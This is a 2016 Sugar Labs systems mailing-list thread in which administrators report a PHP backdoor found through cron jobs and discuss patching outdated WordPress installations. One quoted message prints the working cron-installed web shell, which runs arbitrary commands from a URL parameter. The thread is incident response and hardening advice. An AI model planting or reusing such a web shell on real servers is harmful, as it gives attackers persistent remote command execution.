[Systems] Found a backdoor

Samuel Cantero scanterog at gmail.com
Tue Mar 1 20:55:00 EST 2016
Previous message: [Systems] Found a backdoor
Next message: [Systems] Found a backdoor
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
If you want to keep it and I can do the job. I will try to do it this
weekend.

Best regards,

Samuel C.

On Tue, Mar 1, 2016 at 10:49 PM, Walter Bender <walter.bender at gmail.com>
wrote:

> Let's shut it down for the time being. I've been updating the wiki but not
> my blog since the attack last year anyway.
>
> -walter
>
> On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <bernie at codewiz.org>
> wrote:
>
>> +walter
>>
>> Can we appoint an official maintainer for walterbender.org? Sorry for
>> not stepping up myself, but I'm overwhelmed by work related things and
>> trying to reduce my sysadmin load.
>>
>> On 03/01/2016 02:50 PM, Samuel Cantero wrote:
>> > On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org
>> > <mailto:bernie at codewiz.org>> wrote:
>> >
>> >     On 02/25/2016 04:09 AM, Sebastian Silva wrote:
>> >     > Remember in June we had an incident with a broken Wordpress site.
>> >     > I switched to static generator since then.
>> >     >
>> >     > +1 on containers just learning more about them and finding them
>> fascinating.
>> >     > Count me in on containerizing everything.
>> >     >
>> >     > I'm not aware of other wordpress sites. Maybe walter's blog?
>> >     > Wordpress is a PIA IMHO.
>> >
>> >     Yes, WP is riddled with security holes. Back in October, Samuel
>> helped
>> >     Walter upgrade walterbender.org <http://walterbender.org> on
>> >     sunjammer. Samuel, can you confirm
>> >     that the WP instance now fully patched and locked down?
>> >
>> >
>> > The WP version on walterbender.org <http://walterbender.org> site is
>> > 4.3.1. The WP last version is 4.4.2. I have checked the WP change log
>> > and we can find this:
>> >
>> > 4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site
>> > scripting vulnerability that could allow a site to be compromised.
>> >
>> > 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two
>> > security issues: a possible SSRF for certain local URIs, and an open
>> > redirection attack.
>> >
>> > This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7.
>> > Significant information on the release notes:
>> >
>> >   * Pre-emptive security improvements to ensure that the Akismet plugin
>> >     can't be used by attackers to compromise a WordPress installation.
>> >   * Closes a potential XSS vulnerability.
>> >
>> > Of course, every version has a lot of bug fixes. We definitely should
>> > upgrade it and test nothing breaks walterbender.org
>> > <http://walterbender.org> site.
>> >
>> > Who is in charge of upgrading the others WP sites?
>> >
>> > Regards,
>> >
>> > Samuel C.
>> >
>> >
>> >
>> >
>> >     > Regards,
>> >     > Sebastian
>> >     >
>> >     >
>> >     > On 25/02/16 04:47, Bernie Innocenti wrote:
>> >     >> While I was looking for cronjobs in /var/spool/cron/crontabs/, i
>> >     found
>> >     >> that www-data was executing commands like these:
>> >     >>
>> >     >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6)
>> ==
>> >     >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
>> >     >> @system($time); exit; } ?>' >
>> /srv/www-somosazucar/blog/.cache.php
>> >     >>
>> >     >> Did you spot the system()? This executes arbitrary commands
>> specified
>> >     >> via the "localtime" url parameter. Uh-oh.
>> >     >>
>> >     >> There were about a dozen lines like the above, installing
>> >     .cache.php in
>> >     >> various virtualhosts. I kept a copy of the file in
>> >     >> /root/www-data.backdoor. The file was last written on Jun 23
>> 2015,
>> >     >> which may correlate with the switch to the new website.
>> >     >>
>> >     >> I cleared the mess and searched the logs for requests containing
>> >     >> "localtime", but couldn't find any. I wonder if they could
>> filter the
>> >     >> logs, since they were previously writable by www-data.
>> >     >>
>> >     >> Please watch out. We should ensure directories accessible over
>> >     http are
>> >     >> not writable by user www-data, especially those in which PHP and
>> CGIs
>> >     >> are enabled.
>> >     >>
>> >     >> Running several large sites under the same uid has always been a
>> bad
>> >     >> security practice, and looking forward we should keep migrating
>> >     them to
>> >     >> properly isolated containers.
>> >     >>
>> >     >> Finally, Wordpress is particularly dangerous and we should
>> update and
>> >     >> harden all instances. Can someone please take care of this? I'll
>> do
>> >     >> Mediawiki, which I know pretty well.
>> >     >>
>> >     >
>> >
>> >
>> >     --
>> >      _ // Bernie Innocenti
>> >      \X/  http://codewiz.org
>> >     _______________________________________________
>> >     Systems mailing list
>> >     Systems at lists.sugarlabs.org <mailto:Systems at lists.sugarlabs.org>
>> >     http://lists.sugarlabs.org/listinfo/systems
>> >
>> >
>> >
>> >
>> > _______________________________________________
>> > Systems mailing list
>> > Systems at lists.sugarlabs.org
>> > http://lists.sugarlabs.org/listinfo/systems
>> >
>>
>>
>> --
>>  _ // Bernie Innocenti
>>  \X/  http://codewiz.org
>>
>
>
>
> --
> Walter Bender
> Sugar Labs
> http://www.sugarlabs.org
> <http://www.sugarlabs.org>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.sugarlabs.org/archive/systems/attachments/20160301/fa3a11c0/attachment.html>
Previous message: [Systems] Found a backdoor
Next message: [Systems] Found a backdoor
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
More information about the Systems mailing list